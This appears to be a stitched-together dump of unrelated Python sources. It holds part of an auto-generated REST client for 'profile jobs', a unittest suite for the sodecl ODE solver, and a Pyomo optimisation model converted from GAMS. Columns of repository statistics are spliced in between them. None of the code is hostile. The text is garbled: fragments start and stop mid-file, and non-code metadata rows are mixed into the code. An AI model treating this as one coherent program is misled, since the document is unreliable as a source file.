asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_profile_job(profile_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int profile_job_id: The ID of the profile job to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_profile_job_with_http_info(profile_job_id, **kwargs) # noqa: E501
else:
(data) = self.delete_profile_job_with_http_info(profile_job_id, **kwargs) # noqa: E501
return data
def delete_profile_job_with_http_info(self, profile_job_id, **kwargs): # noqa: E501
"""Delete profile job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_profile_job_with_http_info(profile_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int profile_job_id: The ID of the profile job to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_profile_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_job_id' is set
if self.api_client.client_side_validation and ('profile_job_id' not in params or
params['profile_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `profile_job_id` when calling `delete_profile_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_job_id' in params:
path_params['profileJobId'] = params['profile_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/profile-jobs/{profileJobId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_profile_jobs(self, **kwargs): # noqa: E501
"""Get all profile jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_profile_jobs(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get profile jobs. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:param int environment_id: The ID of the environment to get all profile jobs from
:return: ProfileJobList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_profile_jobs_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_profile_jobs_with_http_info(**kwargs) # noqa: E501
return data
def get_all_profile_jobs_with_http_info(self, **kwargs): # noqa: E501
"""Get all profile jobs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_profile_jobs_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get profile jobs. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:param int environment_id: The ID of the environment to get all profile jobs from
:return: ProfileJobList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size', 'environment_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_profile_jobs" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('page_number', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
if 'environment_id' in params:
query_params.append(('environment_id', params['environment_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/profile-jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProfileJobList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_profile_job_by_id(self, profile_job_id, **kwargs): # noqa: E501
"""Get profile job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_profile_job_by_id(profile_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int profile_job_id: The ID of the profile job to get (required)
:return: ProfileJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_profile_job_by_id_with_http_info(profile_job_id, **kwargs) # noqa: E501
else:
(data) = self.get_profile_job_by_id_with_http_info(profile_job_id, **kwargs) # noqa: E501
return data
def get_profile_job_by_id_with_http_info(self, profile_job_id, **kwargs): # noqa: E501
"""Get profile job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_profile_job_by_id_with_http_info(profile_job_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int profile_job_id: The ID of the profile job to get (required)
:return: ProfileJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_job_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_profile_job_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_job_id' is set
if self.api_client.client_side_validation and ('profile_job_id' not in params or
params['profile_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `profile_job_id` when calling `get_profile_job_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_job_id' in params:
path_params['profileJobId'] = params['profile_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/profile-jobs/{profileJobId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProfileJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_profile_job(self, profile_job_id, body, **kwargs): # noqa: E501
"""Update profile job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_profile_job(profile_job_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int profile_job_id: The ID of the profile job to update (required)
:param ProfileJob body: The updated profile job (required)
:return: ProfileJob
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_profile_job_with_http_info(profile_job_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_profile_job_with_http_info(profile_job_id, body, **kwargs) # noqa: E501
return data
def update_profile_job_with_http_info(self, profile_job_id, body, **kwargs): # noqa: E501
"""Update profile job by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_profile_job_with_http_info(profile_job_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int profile_job_id: The ID of the profile job to update (required)
:param ProfileJob body: The updated profile job (required)
:return: ProfileJob
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_job_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_profile_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_job_id' is set
if self.api_client.client_side_validation and ('profile_job_id' not in params or
params['profile_job_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `profile_job_id` when calling `update_profile_job`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `update_profile_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_job_id' in params:
path_params['profileJobId'] = params['profile_job_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/profile-jobs/{profileJobId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProfileJob', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40
| 142
| 0.612988
| 2,457
| 20,480
| 4.832316
| 0.06919
| 0.080856
| 0.045481
| 0.030321
| 0.942559
| 0.937589
| 0.923271
| 0.900615
| 0.895393
| 0.892698
| 0
| 0.014683
| 0.30166
| 20,480
| 511
| 143
| 40.078278
| 0.81548
| 0.326416
| 0
| 0.781818
| 1
| 0
| 0.181548
| 0.035871
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.014545
| 0
| 0.112727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0eaf0157a2a4f543280246feb04ca192d4058d32
| 5,384
|
py
|
Python
|
tests/sodecl_python_tests.py
|
RSE-Cambridge/sodecl
|
5921588747836810e2dfd89975f36b514ecadb7d
|
[
"BSD-3-Clause"
] | 13
|
2018-01-19T14:08:33.000Z
|
2021-04-08T06:40:58.000Z
|
tests/sodecl_python_tests.py
|
RSE-Cambridge/sodecl
|
5921588747836810e2dfd89975f36b514ecadb7d
|
[
"BSD-3-Clause"
] | 11
|
2017-10-23T13:40:27.000Z
|
2020-08-02T07:50:08.000Z
|
tests/sodecl_python_tests.py
|
RSE-Cambridge/sodecl
|
5921588747836810e2dfd89975f36b514ecadb7d
|
[
"BSD-3-Clause"
] | 4
|
2018-05-15T15:07:26.000Z
|
2021-04-08T06:41:01.000Z
|
import unittest
import numpy
import random
import pickle
import sodecl
class TestPythonWrapper(unittest.TestCase):
def test_oculomotor_euler(self):
openclplatform = 0
opencldevice = 0
openclkernel = 'oculomotor.cl'
solver = 1
dt = 1e-8
tspan = 0.1
ksteps = 40000
localgroupsize = 0
orbits = 2
nequat = 6
nparams = 6
nnoi = 0
# Initial conditions
initx = numpy.ndarray((orbits, nequat))
for o in range(orbits):
initx[o][0] = 0.0
initx[o][1] = 0.0
initx[o][2] = 0.0
initx[o][3] = 0.0
initx[o][4] = 0.0
initx[o][5] = 2.0
# Parameters values
params = numpy.ndarray((orbits, nparams))
for o in range(orbits):
params[o][0] = 120
params[o][1] = 1.5
params[o][2] = 0.0045
params[o][3] = 0.05
params[o][4] = 600
params[o][5] = 9
t, results = sodecl.sodecl(openclplatform, opencldevice, openclkernel,
initx, params, solver,
orbits, nequat, nnoi,
dt, tspan, ksteps, localgroupsize)
test_results = pickle.load(open("data/oculomotor_euler.pkl", "rb"))
self.assertTrue(numpy.isclose(results, test_results).all())
def test_oculomotor_rk(self):
openclplatform = 0
opencldevice = 0
openclkernel = 'oculomotor.cl'
solver = 2
dt = 1e-6
tspan = 0.1
ksteps = 400
localgroupsize = 0
orbits = 2
nequat = 6
nparams = 6
nnoi = 0
# Initial conditions
initx = numpy.ndarray((orbits, nequat))
for o in range(orbits):
initx[o][0] = 0.0
initx[o][1] = 0.0
initx[o][2] = 0.0
initx[o][3] = 0.0
initx[o][4] = 0.0
initx[o][5] = 2.0
# Parameters values
params = numpy.ndarray((orbits, nparams))
for o in range(orbits):
params[o][0] = 120
params[o][1] = 1.5
params[o][2] = 0.0045
params[o][3] = 0.05
params[o][4] = 600
params[o][5] = 9
t, results = sodecl.sodecl(openclplatform, opencldevice, openclkernel,
initx, params, solver,
orbits, nequat, nnoi,
dt, tspan, ksteps, localgroupsize)
test_results = pickle.load(open("data/oculomotor_rk.pkl", "rb"))
self.assertTrue(numpy.isclose(results, test_results).all())
def test_oculomotor_ie(self):
openclplatform = 0
opencldevice = 0
openclkernel = 'oculomotor.cl'
solver = 3
dt = 1e-6
tspan = 0.1
ksteps = 400
localgroupsize = 0
orbits = 2
nequat = 6
nparams = 6
nnoi = 0
# Initial conditions
initx = numpy.ndarray((orbits, nequat))
for o in range(orbits):
initx[o][0] = 0.0
initx[o][1] = 0.0
initx[o][2] = 0.0
initx[o][3] = 0.0
initx[o][4] = 0.0
initx[o][5] = 2.0
# Parameters values
params = numpy.ndarray((orbits, nparams))
for o in range(orbits):
params[o][0] = 120
params[o][1] = 1.5
params[o][2] = 0.0045
params[o][3] = 0.05
params[o][4] = 600
params[o][5] = 9
t, results = sodecl.sodecl(openclplatform, opencldevice, openclkernel,
initx, params, solver,
orbits, nequat, nnoi,
dt, tspan, ksteps, localgroupsize)
test_results = pickle.load(open("data/oculomotor_ie.pkl", "rb"))
self.assertTrue(numpy.isclose(results, test_results).all())
def test_oculomotor_im(self):
openclplatform = 0
opencldevice = 0
openclkernel = 'oculomotor.cl'
solver = 4
dt = 1e-6
tspan = 0.1
ksteps = 400
localgroupsize = 0
orbits = 2
nequat = 6
nparams = 6
nnoi = 0
# Initial conditions
initx = numpy.ndarray((orbits, nequat))
for o in range(orbits):
initx[o][0] = 0.0
initx[o][1] = 0.0
initx[o][2] = 0.0
initx[o][3] = 0.0
initx[o][4] = 0.0
initx[o][5] = 2.0
# Parameters values
params = numpy.ndarray((orbits, nparams))
for o in range(orbits):
params[o][0] = 120
params[o][1] = 1.5
params[o][2] = 0.0045
params[o][3] = 0.05
params[o][4] = 600
params[o][5] = 9
t, results = sodecl.sodecl(openclplatform, opencldevice, openclkernel,
initx, params, solver,
orbits, nequat, nnoi,
dt, tspan, ksteps, localgroupsize)
test_results = pickle.load(open("data/oculomotor_im.pkl", "rb"))
self.assertTrue(numpy.isclose(results, test_results).all())
if __name__ == '__main__':
unittest.main()
| 29.420765
| 78
| 0.476412
| 611
| 5,384
| 4.152209
| 0.114566
| 0.05676
| 0.055183
| 0.063067
| 0.926291
| 0.926291
| 0.926291
| 0.926291
| 0.926291
| 0.828538
| 0
| 0.071047
| 0.409175
| 5,384
| 182
| 79
| 29.582418
| 0.726501
| 0.027303
| 0
| 0.851351
| 0
| 0
| 0.030413
| 0.017406
| 0
| 0
| 0
| 0
| 0.027027
| 1
| 0.027027
| false
| 0
| 0.033784
| 0
| 0.067568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ebefd2516a631c322bd8415895dbe55590b4cf3
| 23,705
|
py
|
Python
|
tests/examples/minlplib/bayes2_20.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | 2
|
2021-07-03T13:19:10.000Z
|
2022-02-06T10:48:13.000Z
|
tests/examples/minlplib/bayes2_20.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | 1
|
2021-07-04T14:52:14.000Z
|
2021-07-15T10:17:11.000Z
|
tests/examples/minlplib/bayes2_20.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | null | null | null |
# NLP written by GAMS Convert at 04/21/18 13:51:12
#
# Equation counts
# Total E G L N X C B
# 78 68 10 0 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 87 87 0 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 616 176 440 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x2 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x3 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x4 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x5 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x6 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x7 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x8 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x9 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x10 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x11 = Var(within=Reals,bounds=(0,10000),initialize=1)
m.x12 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x13 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x14 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x15 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x16 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x17 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x18 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x19 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x20 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x21 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x22 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x23 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x24 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x25 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x26 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x27 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x28 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x29 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x30 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x31 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x32 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x33 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x34 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x35 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x36 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x37 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x38 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x39 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x40 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x41 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x42 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x43 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x44 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x45 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x46 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x47 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x48 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x49 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x50 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x51 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x52 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x53 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x54 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x55 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x56 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x57 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x58 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x59 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x60 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x61 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x62 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x63 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x64 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x65 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x66 = Var(within=Reals,bounds=(0,1),initialize=0.01)
m.x67 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x68 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x69 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x70 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x71 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x72 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x73 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x74 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x75 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x76 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x77 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x78 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x79 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x80 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x81 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x82 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x83 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x84 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x85 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.x86 = Var(within=Reals,bounds=(0,1000),initialize=0)
m.obj = Objective(expr= m.x67 + m.x68 + m.x69 + m.x70 + m.x71 + m.x72 + m.x73 + m.x74 + m.x75 + m.x76 + m.x77 + m.x78
+ m.x79 + m.x80 + m.x81 + m.x82 + m.x83 + m.x84 + m.x85 + m.x86, sense=minimize)
m.c1 = Constraint(expr=0.2*m.x2 - m.x12*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 + 0.409692183046145*
m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*m.x8 + 0.335603041715*
m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c2 = Constraint(expr=0.32003200320032*m.x3 - m.x13*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*m.x8
+ 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c3 = Constraint(expr=0.0399839983998399*m.x3 - m.x14*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
+ 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c4 = Constraint(expr=0.3840672124824*m.x4 - m.x15*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*m.x8
+ 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c5 = Constraint(expr=0.0959807923180794*m.x4 - m.x16*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
+ 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c6 = Constraint(expr=0.00799040096048009*m.x4 - m.x17*(0.00799040096048009*m.x4 + 0.0255769561603844*m.x5 +
0.0511679852758392*m.x6 + 0.0818892538741687*m.x7 + 0.114670766025168*m.x8 + 0.146807956791712*
m.x9 + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c7 = Constraint(expr=0.409692183046145*m.x5 - m.x18*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*m.x8
+ 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c8 = Constraint(expr=0.153596150395582*m.x5 - m.x19*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*m.x8
+ 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c9 = Constraint(expr=0.0255769561603844*m.x5 - m.x20*(0.00799040096048009*m.x4 + 0.0255769561603844*m.x5 +
0.0511679852758392*m.x6 + 0.0818892538741687*m.x7 + 0.114670766025168*m.x8 + 0.146807956791712*
m.x9 + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c10 = Constraint(expr=0.001596161920384*m.x5 - m.x21*(0.001596161920384*m.x5 + 0.00638720256256101*m.x6 +
0.0153350375081317*m.x7 + 0.0286354282546281*m.x8 + 0.0458315860606947*m.x9 + 0.0660172990246554
*m.x10 + 0.0880472935145168*m.x11) == 0)
m.c11 = Constraint(expr=0.409702429449282*m.x6 - m.x22*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*
m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c12 = Constraint(expr=0.204825598716796*m.x6 - m.x23*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*
m.x8 + 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c13 = Constraint(expr=0.0511679852758392*m.x6 - m.x24*(0.00799040096048009*m.x4 + 0.0255769561603844*m.x5 +
0.0511679852758392*m.x6 + 0.0818892538741687*m.x7 + 0.114670766025168*m.x8 + 0.146807956791712*
m.x9 + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c14 = Constraint(expr=0.00638720256256101*m.x6 - m.x25*(0.001596161920384*m.x5 + 0.00638720256256101*m.x6 +
0.0153350375081317*m.x7 + 0.0286354282546281*m.x8 + 0.0458315860606947*m.x9 + 0.0660172990246554
*m.x10 + 0.0880472935145168*m.x11) == 0)
m.c15 = Constraint(expr=0.000318721407871794*m.x6 - m.x26*(0.000318721407871794*m.x6 + 0.00153062807182051*m.x7 +
0.00428779555860749*m.x8 + 0.00915141635884911*m.x9 + 0.0164795558845939*m.x10 +
0.0263778458318911*m.x11) == 0)
m.c16 = Constraint(expr=0.393314332271309*m.x7 - m.x27*(0.2*m.x2 + 0.32003200320032*m.x3 + 0.3840672124824*m.x4 +
0.409692183046145*m.x5 + 0.409702429449282*m.x6 + 0.393314332271309*m.x7 + 0.367084193942431*
m.x8 + 0.335603041715*m.x9 + 0.302020066201112*m.x10 + 0.268435410656179*m.x11) == 0)
m.c17 = Constraint(expr=0.245821457669569*m.x7 - m.x28*(0.0399839983998399*m.x3 + 0.0959807923180794*m.x4 +
0.153596150395582*m.x5 + 0.204825598716796*m.x6 + 0.245821457669569*m.x7 + 0.275347581122294*
m.x8 + 0.2937261297672*m.x9 + 0.302133422913057*m.x10 + 0.302140983052761*m.x11) == 0)
m.c18 = Constraint(expr=0.0818892538741687*m.x7 - m.x29*(0.00799040096048009*m.x4 + 0.0255769561603844*m.x5 +
0.0511679852758392*m.x6 + 0.0818892538741687*m.x7 + 0.114670766025168*m.x8 + 0.146807956791712*
m.x9 + 0.176200402504464*m.x10 + 0.201402121569511*m.x11) == 0)
m.c19 = Constraint(expr=0.0153350375081317*m.x7 - m.x30*(0.001596161920384*m.x5 + 0.00638720256256101*m.x6 +
0.0153350375081317*m.x7 + 0.0286354282546281*m.x8 + 0.0458315860606947*m.x9 + 0.0660172990246554
*m.x10 + 0.0880472935145168*m.x11) == 0)
m.c20 = Constraint(expr=0.00153062807182051*m.x7 - m.x31*(0.000318721407871794*m.x6 + 0.00153062807182051*m.x7 +
0.00428779555860749*m.x8 + 0.00915141635884911*m.x9 + 0.0164795558845939*m.x10 +
0.0263778458318911*m.x11) == 0)
